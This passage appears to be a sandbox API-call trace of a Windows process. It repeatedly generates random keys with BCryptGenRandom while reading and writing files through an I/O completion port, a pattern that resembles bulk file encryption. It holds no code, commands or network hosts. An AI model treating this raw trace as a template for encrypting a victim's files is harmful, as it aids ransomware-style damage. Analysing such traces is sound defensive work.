lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.492] CloseHandle (hObject=0x3a0) returned 1 [0080.493] free (_Block=0x1fb18c0) [0080.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.512] CloseHandle (hObject=0x3ac) returned 1 [0080.512] free (_Block=0x3d70048) [0080.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.524] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5fd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0080.526] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.544] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.549] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.549] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.549] free (_Block=0x77d800) [0080.549] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.549] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.550] free (_Block=0x1ff1930) [0080.550] free (_Block=0x1ff1a40) [0080.550] free (_Block=0x77d908) [0080.550] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.550] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.551] CloseHandle (hObject=0x3a0) returned 1 [0080.551] free (_Block=0x1fb18c0) [0080.551] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.551] CloseHandle (hObject=0x3c4) returned 1 [0080.552] free (_Block=0x1ff1e60) [0080.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.601] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.601] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.601] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.602] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.602] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.602] free (_Block=0x77d800) [0080.602] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.602] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.602] free (_Block=0x1ff1930) [0080.602] free (_Block=0x1ff1a40) [0080.602] free (_Block=0x77d908) [0080.602] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.639] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.651] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x123d, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.667] CloseHandle (hObject=0x3a0) returned 1 [0080.667] free (_Block=0x1ff1e60) [0080.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.697] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.698] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.698] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.698] free (_Block=0x77d800) [0080.698] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.699] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.699] free (_Block=0x1ff1930) [0080.699] free (_Block=0x1ff1a40) [0080.699] free (_Block=0x77d908) [0080.699] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.707] CloseHandle (hObject=0x3c0) returned 1 [0080.707] free (_Block=0x3d70048) [0080.707] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.716] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.717] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.718] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.718] free (_Block=0x77d800) [0080.718] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.718] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.718] free (_Block=0x1ff1930) [0080.718] free (_Block=0x1ff1a40) [0080.718] free (_Block=0x77d908) [0080.718] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.725] CloseHandle (hObject=0x3c4) returned 1 [0080.725] free (_Block=0x1fb18c0) [0080.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.733] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.733] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.733] free (_Block=0x77d800) [0080.733] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0080.733] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0080.734] free (_Block=0x2031ed0) [0080.734] free (_Block=0x2031fe0) [0080.734] free (_Block=0x77d908) [0080.734] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.734] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.866] CloseHandle (hObject=0x3c4) returned 1 [0080.867] free (_Block=0x1fb18c0) [0080.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.880] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.880] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.880] free (_Block=0x77d800) [0080.880] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.880] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.880] free (_Block=0x1ff1930) [0080.880] free (_Block=0x1ff1a40) [0080.880] free (_Block=0x77d908) [0080.880] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.888] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.889] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0080.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.889] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0080.890] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.890] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.890] free (_Block=0x77d800) [0080.890] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.890] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.890] free (_Block=0x1ff1930) [0080.890] free (_Block=0x1ff1a40) [0080.890] free (_Block=0x77d908) [0080.890] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.948] WriteFile (in: hFile=0x3b4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x75c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0080.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.954] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.967] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0080.967] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.109] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0081.110] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.113] CloseHandle (hObject=0x3c4) returned 1 [0081.113] free (_Block=0x1fb18c0) [0081.113] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0081.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0081.126] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.126] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.126] free (_Block=0x77d800) [0081.126] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.126] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.126] free (_Block=0x1ff1930) [0081.126] free (_Block=0x1ff1a40) [0081.126] free (_Block=0x77d908) [0081.126] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.127] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.143] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x43e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.144] CloseHandle (hObject=0x3c4) returned 1 [0081.148] free (_Block=0x1fb18c0) [0081.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0081.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0081.158] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.158] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.158] free (_Block=0x77d800) [0081.158] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.158] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.158] free (_Block=0x1ff1930) [0081.158] free (_Block=0x1ff1a40) [0081.158] free (_Block=0x77d908) [0081.158] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.159] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.187] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.199] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.199] CloseHandle (hObject=0x3c4) returned 1 [0081.204] free (_Block=0x1fb18c0) [0081.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0081.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0081.215] 